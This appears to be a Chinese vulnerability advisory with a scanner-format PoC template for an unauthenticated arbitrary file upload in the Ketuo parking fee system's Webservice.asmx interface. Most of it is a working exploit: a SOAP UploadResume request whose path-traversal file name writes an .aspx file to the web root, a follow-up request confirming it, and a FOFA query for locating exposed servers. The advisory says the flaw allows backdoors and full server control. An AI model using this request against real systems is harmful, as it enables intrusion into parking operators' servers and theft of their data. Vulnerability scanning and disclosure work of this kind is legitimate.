漏洞描述
科拓全智能停车收费系统Webservice.asmx接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
FOFA:body="/KT_Css/qd_defaul.css"
ketuo-webservice-asmx-fileupload: 科拓全智能停车收费系统任意文件上传漏洞
PoC代码[已公开]
id: ketuo-webservice-asmx-fileupload
info:
name: 科拓全智能停车收费系统任意文件上传漏洞
author: avic123
severity: critical
verified: true
description: |
科拓全智能停车收费系统Webservice.asmx接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
FOFA:body="/KT_Css/qd_defaul.css"
reference:
- https://blog.csdn.net/weixin_42207802/article/details/139002532
tags: ketuo,科拓,fileupload
created: 2025/03/05
set:
hostname: request.url.host
randstr_url: randomLowercase(8)
randstr_content: randomLowercase(8)
base64_content: base64(string(randstr_content))
rules:
r0:
request:
method: POST
path: /Webservice.asmx
headers:
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/UploadResume"
body: |
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../{{randstr_url}}.aspx</fileName>
<fileFlow>{{base64_content}}</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>
expression: response.status == 200
r1:
request:
method: GET
path: /{{randstr_url}}.aspx
expression: response.status == 200 && response.body.bcontains(bytes(randstr_content))
expression: r0() && r1()